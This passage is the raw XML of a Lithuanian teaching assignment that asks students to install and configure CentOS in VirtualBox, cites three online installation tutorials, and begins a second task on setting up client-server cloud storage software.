          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2B97B7FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>serverinę operacinę sistemą C</w:t>
      </w:r>
      <w:r w:rsidR="00D040C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidR="2B97B7FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2B97B7FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>įdie</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="2B97B7FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ją </w:t>
      </w:r>
      <w:r w:rsidR="00A95951" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>virtualioje aplinkoje</w:t>
      </w:r>
      <w:r w:rsidR="006D140C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="399B8168" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(Virtual Box</w:t>
      </w:r>
      <w:r w:rsidR="002E334F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="399B8168" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tlik</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="399B8168" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>konfigūravimą ir</w:t>
      </w:r>
      <w:r w:rsidR="2B97B7FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6520F6E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pri</w:t>
      </w:r>
      <w:r w:rsidR="2B97B7FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jun</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="2B97B7FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="399B8168" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kompiuter</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidR="2B97B7FE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D320B" w14:textId="7F1CFBCC" w:rsidR="0B4A386B" w:rsidRPr="005A5C28" w:rsidRDefault="0B4A386B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B116020" w14:textId="0F149750" w:rsidR="77A2F8D5" w:rsidRPr="005A5C28" w:rsidRDefault="3F15F44B"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Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B99B21" w14:textId="05CB97DD" w:rsidR="2B508D93" w:rsidRPr="005A5C28" w:rsidRDefault="1D0CA2A9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Shovon</w:t>
      </w:r>
      <w:r w:rsidR="007A2483" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="549DD1D1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>S. (2020</w:t>
      </w:r>
      <w:r w:rsidR="5DD821B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">, Gruodžio </w:t>
      </w:r>
      <w:r w:rsidR="3BDD7C97" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="5DD821B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> d.</w:t>
      </w:r>
      <w:r w:rsidR="549DD1D1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>). How to Install CentOS 8 on VirtualBox</w:t>
      </w:r>
      <w:r w:rsidR="5573FEC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="5573FEC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LINUX HINT</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="5573FEC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidR="3F15F44B" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://linuxhint.com/install_centos8_virtualbox/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23093838" w14:textId="4B54D015" w:rsidR="2B508D93" w:rsidRPr="005A5C28" w:rsidRDefault="7B2E1123" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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How to install CentOS 8 with VirtualBox 6.1 on Windows 10. </w:t>
      </w:r>
      <w:r w:rsidR="52E0BE26" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Vitux.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="52E0BE26" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidR="3F15F44B" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://vitux.com/install-centos-with-virtualbox-on-windows/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DC1C899" w14:textId="4293C467" w:rsidR="2B508D93" w:rsidRPr="005A5C28" w:rsidRDefault="1D8F7B2E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Tavares</w:t>
      </w:r>
      <w:r w:rsidR="007A2483" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> P. (2021, sausio </w:t>
      </w:r>
      <w:r w:rsidR="3613BD7B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">7). Installing and Configuring CentOS 8 on Virtualbox [updated 2021]. </w:t>
      </w:r>
      <w:r w:rsidR="6774BBD9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Infosec.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="22CA839D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="6774BBD9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidR="3F15F44B" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://resources.infosecinstitute.com/topic/installing-configuring-centos-7-virtualbox/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20FB0CF2" w14:textId="10E14DDA" w:rsidR="171451CB" w:rsidRPr="005A5C28" w:rsidRDefault="171451CB" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038E3E93" w14:textId="47D14848" w:rsidR="0001674F" w:rsidRPr="005A5C28" w:rsidRDefault="7D9DED06"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2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="72D925D1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ĮDIEGTI IR KONFIGŪRUOTI </w:t>
      </w:r>
      <w:r w:rsidR="13D9D72B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SERVERI</w:t>
      </w:r>
      <w:r w:rsidR="104FAE63" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="13D9D72B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>-KLIENT</w:t>
      </w:r>
      <w:r w:rsidR="58206F1E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>O PROGRAMŲ RINKINĮ</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="58206F1E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">SKIRTĄ </w:t>
      </w:r>
      <w:r w:rsidR="0A727BC4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DEBESŲ SAUGYKL</w:t>
      </w:r>
      <w:r w:rsidR="0EDEBD23" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r w:rsidR="0A727BC4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13632F0A" w14:textId="09C3CB42" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="72D925D1" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>audo</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>serverinę operacinę sistemą C</w:t>
      </w:r>
      <w:r w:rsidR="007C370A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="57FD4CC5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įdie</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="57FD4CC5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ją</w:t>
      </w:r>
      <w:r w:rsidR="7B03E2A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D140C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">virtualioje aplinkoje </w:t>
      </w:r>
      <w:r w:rsidR="57FD4CC5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>(Virtual Box</w:t>
      </w:r>
      <w:r w:rsidR="17724468" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Į </w:t>
      </w:r>
      <w:r w:rsidR="57FD4CC5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00FF3D02" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidR="57FD4CC5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="60FD2C2C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">operacinę sistemą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įdie</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
